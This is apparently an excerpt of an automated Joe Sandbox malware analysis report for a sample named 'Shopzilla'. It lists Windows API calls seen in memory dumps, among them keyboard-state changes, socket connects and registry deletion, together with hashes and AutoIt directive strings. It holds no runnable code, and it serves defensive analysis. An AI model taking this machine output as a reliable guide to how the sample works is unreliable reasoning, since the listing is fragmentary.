                                              • Instruction Fuzzy Hash: 3D51E3A06087D13EFB364728CC55BBAFFA99B06304F0C4589F9E5468C2C2E9AE94D750
                                              APIs
                                              • GetParent.USER32(00000000), ref: 00C01410
                                              • GetKeyboardState.USER32(?), ref: 00C01425
                                              • SetKeyboardState.USER32(?), ref: 00C01486
                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C014B2
                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C014CF
                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C01513
                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C01534
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: 90da5391d41d8704a54b2f96e72f4b3aad35df98e251a86dcec7515440f0a713
                                              • Instruction ID: 7f5773c7cf2a6455ccaea81954290ac6dbf77331a2cba153a53bb6cf384059d8
                                              • Opcode Fuzzy Hash: 90da5391d41d8704a54b2f96e72f4b3aad35df98e251a86dcec7515440f0a713
                                              • Instruction Fuzzy Hash: D95128A05487D53DFB3383748C55B7AFFA9AB46300F0C4489F9E64A8D2D2A4EE84E750
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _wcsncpy$LocalTime
                                              • String ID:
                                              • API String ID: 2945705084-0
                                              • Opcode ID: d5159afe93222a7b0cd8f20a1705cedb10734a0bee44ad929f301ebecc6d36e5
                                              • Instruction ID: c496542f48fe548491fd450898b7b4140a8a9e12ccd7725da6d61ba1f558c281
                                              • Opcode Fuzzy Hash: d5159afe93222a7b0cd8f20a1705cedb10734a0bee44ad929f301ebecc6d36e5
                                              • Instruction Fuzzy Hash: 33418FB5C2061476CB11EBA4888AECFB3FC9F05310F5084AAF519E3261EB75E355C7A9
                                              APIs
                                                • Part of subcall function 00C04A30: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C039F7,?), ref: 00C04A4D
                                                • Part of subcall function 00C04A30: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C039F7,?), ref: 00C04A66
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00C03A17
                                              • _wcscmp.LIBCMT ref: 00C03A33
                                              • MoveFileW.KERNEL32(?,?), ref: 00C03A4B
                                              • _wcscat.LIBCMT ref: 00C03A93
                                              • SHFileOperationW.SHELL32(?), ref: 00C03AFF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                              • String ID: \*.*
                                              • API String ID: 1377345388-1173974218
                                              • Opcode ID: 71055a3f53f44221ce196fb91fcdae493318673bc9c5a1f5c88ae38637f65595
                                              • Instruction ID: 4dd171bff9a194301e48a0508fe686ee52c7289d59d49861444ce6b327782389
                                              • Opcode Fuzzy Hash: 71055a3f53f44221ce196fb91fcdae493318673bc9c5a1f5c88ae38637f65595
                                              • Instruction Fuzzy Hash: A1419DB1608384AEC755EF64D441AEFB7ECEF88340F40096EB49AC3191EA34D789C766
                                              APIs
                                              • _memset.LIBCMT ref: 00C27697
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C2773E
                                              • IsMenu.USER32(?), ref: 00C27756
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C2779E
                                              • DrawMenuBar.USER32 ref: 00C277B1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                              • String ID: 0
                                              • API String ID: 3866635326-4108050209
                                              • Opcode ID: e17751265214dead3bdc6d73062c2c64c444d4859a8c5b9d0e014f235afab4f6
                                              • Instruction ID: 74fe6c2ab0ed54fe1e14571d402d3e8a051c97da077a38881fe63fbd2104ad84
                                              • Opcode Fuzzy Hash: e17751265214dead3bdc6d73062c2c64c444d4859a8c5b9d0e014f235afab4f6
                                              • Instruction Fuzzy Hash: 2B414975A04219AFDB21DF60E8C4E9ABBF8FB08314F148269ED1597760D770AE50CFA0
                                              APIs
                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00C213F9
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C21423
                                              • FreeLibrary.KERNEL32(00000000), ref: 00C214DA
                                                • Part of subcall function 00C213CA: RegCloseKey.ADVAPI32(?), ref: 00C21440
                                                • Part of subcall function 00C213CA: FreeLibrary.KERNEL32(?), ref: 00C21492
                                                • Part of subcall function 00C213CA: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C214B5
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C2147D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                              • String ID:
                                              • API String ID: 395352322-0
                                              • Opcode ID: 205c6c12540452fe7a2e9b919f3baf146ea2937a6d84e95c58ac9a1ff8f25883
                                              • Instruction ID: 26a5a0f390102f2b6f121196c20597d5c53a99c7e65c6d849aaf479abcf32ced
                                              • Opcode Fuzzy Hash: 205c6c12540452fe7a2e9b919f3baf146ea2937a6d84e95c58ac9a1ff8f25883
                                              • Instruction Fuzzy Hash: 41314B71910119BFDB18DF90EC89BFEB7BCEF18340F14016AE916A2541EB74AF459BA0
                                              APIs
                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00C266D9
                                              • GetWindowLongW.USER32(00D356E0,000000F0), ref: 00C2670C
                                              • GetWindowLongW.USER32(00D356E0,000000F0), ref: 00C26741
                                              • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00C26773
                                              • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00C2679D
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00C267AE
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C267C8
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: LongWindow$MessageSend
                                              • String ID:
                                              • API String ID: 2178440468-0
                                              • Opcode ID: a8c783d4d3978948d1403a187f5e7599f85f8b23e1be779ab7bc9cad3103af16
                                              • Instruction ID: b0f9f74dfe356e72b5b3a7ae58d8d4a534423796c58a4620f9f6585d925a0ef8
                                              • Opcode Fuzzy Hash: a8c783d4d3978948d1403a187f5e7599f85f8b23e1be779ab7bc9cad3103af16
                                              • Instruction Fuzzy Hash: 3B3159352041609FDB20CF19EC95F5937E5FB89B14F2901A4FA108B6B2CB71AD50DBA0
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BFE0AD
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BFE0D3
                                              • SysAllocString.OLEAUT32(00000000), ref: 00BFE0D6
                                              • SysAllocString.OLEAUT32(?), ref: 00BFE0F4
                                              • SysFreeString.OLEAUT32(?), ref: 00BFE0FD
                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00BFE122
                                              • SysAllocString.OLEAUT32(?), ref: 00BFE130
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: 7661b516362f68ae180cc8dd3285f12e354150de27969ae31a81139b5c658e87
                                              • Instruction ID: 901618e1e00e556ec71c2ce1c6f06ab8c74e2aa22393607988cc9c80d13a8066
                                              • Opcode Fuzzy Hash: 7661b516362f68ae180cc8dd3285f12e354150de27969ae31a81139b5c658e87
                                              • Instruction Fuzzy Hash: 6E21B73260020DAF9B10DFB8CC84DBF73ECEB08360B148569FA24DB160D670DD458760
                                              APIs
                                                • Part of subcall function 00C1823D: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C18268
                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C16676
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00C16685
                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C166BE
                                              • connect.WSOCK32(00000000,?,00000010), ref: 00C166C7
                                              • WSAGetLastError.WSOCK32 ref: 00C166D1
                                              • closesocket.WSOCK32(00000000), ref: 00C166FA
                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C16713
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                              • String ID:
                                              • API String ID: 910771015-0
                                              • Opcode ID: 99d8a31ba376fccb44857eafdeab5a6042f519d5bdbe01839d5136f139bc43a1
                                              • Instruction ID: 9fe8cd41508435a23b7411b79b43e192541551c13409ab77faf7ea61f9c5b658
                                              • Opcode Fuzzy Hash: 99d8a31ba376fccb44857eafdeab5a6042f519d5bdbe01839d5136f139bc43a1
                                              • Instruction Fuzzy Hash: 6331C071600208AFDB10AF64CC85BFE77ECEB46764F108069FD55A72D1DB70AD849BA1
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BFE188
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BFE1AE
                                              • SysAllocString.OLEAUT32(00000000), ref: 00BFE1B1
                                              • SysAllocString.OLEAUT32 ref: 00BFE1D2
                                              • SysFreeString.OLEAUT32 ref: 00BFE1DB
                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00BFE1F5
                                              • SysAllocString.OLEAUT32(?), ref: 00BFE203
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: b2005be5c3bbc01cdd2353470596b365fdd03c44c7364092b9088b85f530198b
                                              • Instruction ID: cc8775852742a87e00fbe088df642f5f560b093f7e9eaf9a122a7ba3dfe2715a
                                              • Opcode Fuzzy Hash: b2005be5c3bbc01cdd2353470596b365fdd03c44c7364092b9088b85f530198b
                                              • Instruction Fuzzy Hash: 59218B32604108AF9B109FADDC88EBE77ECFB09360B108165FB25CB1B0D670ED458B64
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                              • API String ID: 1038674560-2734436370
                                              • Opcode ID: 5812ea22b7cf69a1e4bd30ae209ec33121ff345e5c1ba0947fb4663658c75618
                                              • Instruction ID: 3716afd6050caeab4c315e91b8e2fa34a9df42b539f0d266d05b65cfaa861f38
                                              • Opcode Fuzzy Hash: 5812ea22b7cf69a1e4bd30ae209ec33121ff345e5c1ba0947fb4663658c75618
                                              • Instruction Fuzzy Hash: 2121293210452F6AD320B7259C52FBBB3D8EF51740F5044BAFE4687182EBA1AD85C395
                                              APIs
                                                • Part of subcall function 00BA2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BA214F
                                                • Part of subcall function 00BA2111: GetStockObject.GDI32(00000011), ref: 00BA2163
                                                • Part of subcall function 00BA2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA216D
                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C27A1F
                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C27A2C
                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C27A37
                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C27A46
                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C27A52
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSend$CreateObjectStockWindow
                                              • String ID: Msctls_Progress32
                                              • API String ID: 1025951953-3636473452
                                              • Opcode ID: 02cc18f3f3a0437cf53b051d8f5376f332db136c9c2299e244fe0fd2a71d6f5f
                                              • Instruction ID: e27b79198db8acc36db3f7a6064d500027128efebe69e968d501b0f40a0e668c
                                              • Opcode Fuzzy Hash: 02cc18f3f3a0437cf53b051d8f5376f332db136c9c2299e244fe0fd2a71d6f5f
                                              • Instruction Fuzzy Hash: EB1193B2110219BFEF119F61DC85EEB7F6DEF08768F014215BB04A2050C6719C61DBA0
                                              APIs
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00BF0797,?,?,00000000,00000000), ref: 00C09D55
                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00BF0797,?,?,00000000,00000000), ref: 00C09D6C
                                              • LoadResource.KERNEL32(?,00000000,?,?,00BF0797,?,?,00000000,00000000,?,?,?,?,?,?,00BB4A14), ref: 00C09D7C
                                              • SizeofResource.KERNEL32(?,00000000,?,?,00BF0797,?,?,00000000,00000000,?,?,?,?,?,?,00BB4A14), ref: 00C09D8D
                                              • LockResource.KERNEL32(00BF0797,?,?,00BF0797,?,?,00000000,00000000,?,?,?,?,?,?,00BB4A14,00000000), ref: 00C09D9C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                              • String ID: SCRIPT
                                              • API String ID: 3051347437-3967369404
                                              • Opcode ID: ea1d194274c05b22d23241a968d82e8c7941247eee18d1cc0e0c44660e7ed48d
                                              • Instruction ID: d1552a6a70e5785c988691f807be87c3deedd27eb0e8fa7514a09cd623be86f7
                                              • Opcode Fuzzy Hash: ea1d194274c05b22d23241a968d82e8c7941247eee18d1cc0e0c44660e7ed48d
                                              • Instruction Fuzzy Hash: 25113CB1240701BFE7258B65DC58F277BB9EBC5B11F2442ACF815962A1DB72EC00C660
                                              APIs
                                              • __init_pointers.LIBCMT ref: 00BC9C46
                                                • Part of subcall function 00BC32E9: EncodePointer.KERNEL32(00000000), ref: 00BC32EC
                                                • Part of subcall function 00BC32E9: __initp_misc_winsig.LIBCMT ref: 00BC3307
                                                • Part of subcall function 00BC32E9: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00BCA000
                                                • Part of subcall function 00BC32E9: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00BCA014
                                                • Part of subcall function 00BC32E9: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00BCA027
                                                • Part of subcall function 00BC32E9: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00BCA03A
                                                • Part of subcall function 00BC32E9: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00BCA04D
                                                • Part of subcall function 00BC32E9: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00BCA060
                                                • Part of subcall function 00BC32E9: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00BCA073
                                                • Part of subcall function 00BC32E9: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00BCA086
                                                • Part of subcall function 00BC32E9: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00BCA099
                                                • Part of subcall function 00BC32E9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00BCA0AC
                                                • Part of subcall function 00BC32E9: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00BCA0BF
                                                • Part of subcall function 00BC32E9: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00BCA0D2
                                                • Part of subcall function 00BC32E9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00BCA0E5
                                                • Part of subcall function 00BC32E9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00BCA0F8
                                                • Part of subcall function 00BC32E9: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00BCA10B
                                                • Part of subcall function 00BC32E9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00BCA11E
                                              • __mtinitlocks.LIBCMT ref: 00BC9C4B
                                              • __mtterm.LIBCMT ref: 00BC9C54
                                                • Part of subcall function 00BC9CBC: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00BC9C59,00BC7E2D,00C5B0B8,00000014), ref: 00BC9DB6
                                                • Part of subcall function 00BC9CBC: _free.LIBCMT ref: 00BC9DBD
                                                • Part of subcall function 00BC9CBC: DeleteCriticalSection.KERNEL32(00C5FC00,?,?,00BC9C59,00BC7E2D,00C5B0B8,00000014), ref: 00BC9DDF
                                              • __calloc_crt.LIBCMT ref: 00BC9C79
                                              • __initptd.LIBCMT ref: 00BC9C9B
                                              • GetCurrentThreadId.KERNEL32 ref: 00BC9CA2
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                              • String ID:
                                              • API String ID: 3567560977-0
                                              • Opcode ID: 2020a08d5e39ecd3bfc74a971dea29aa51a1c51b1eb7e663daf25034da9e6746
                                              • Instruction ID: 1ade20f8c96dae42b2d4b9eaac17d95b807797c25a9368dc1f48e27f55422835
                                              • Opcode Fuzzy Hash: 2020a08d5e39ecd3bfc74a971dea29aa51a1c51b1eb7e663daf25034da9e6746
                                              • Instruction Fuzzy Hash: D1F06D32659B1169FA3877787C0BF9B37D0DB02730B2006AEF460D50E2EE2189815590
                                              APIs
                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00BC41B2,?), ref: 00BC4103
                                              • GetProcAddress.KERNEL32(00000000), ref: 00BC410A
                                              • EncodePointer.KERNEL32(00000000), ref: 00BC4116
                                              • DecodePointer.KERNEL32(00000001,00BC41B2,?), ref: 00BC4133
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                              • String ID: RoInitialize$combase.dll
                                              • API String ID: 3489934621-340411864
                                              • Opcode ID: ed439c3bb977d6f9f70c70cabf718a45929b098a121c9b610c0b02917a454aea
                                              • Instruction ID: 3e841ff0132df6017f1372cdd0e00baffd05d2e77c13f5e312ee144805117013
                                              • Opcode Fuzzy Hash: ed439c3bb977d6f9f70c70cabf718a45929b098a121c9b610c0b02917a454aea
                                              • Instruction Fuzzy Hash: 7AE0E5B16A0341AFDE601F71EC5DB4C3AA4E726B02F605468F451E50B0DBF941948B00
                                              APIs
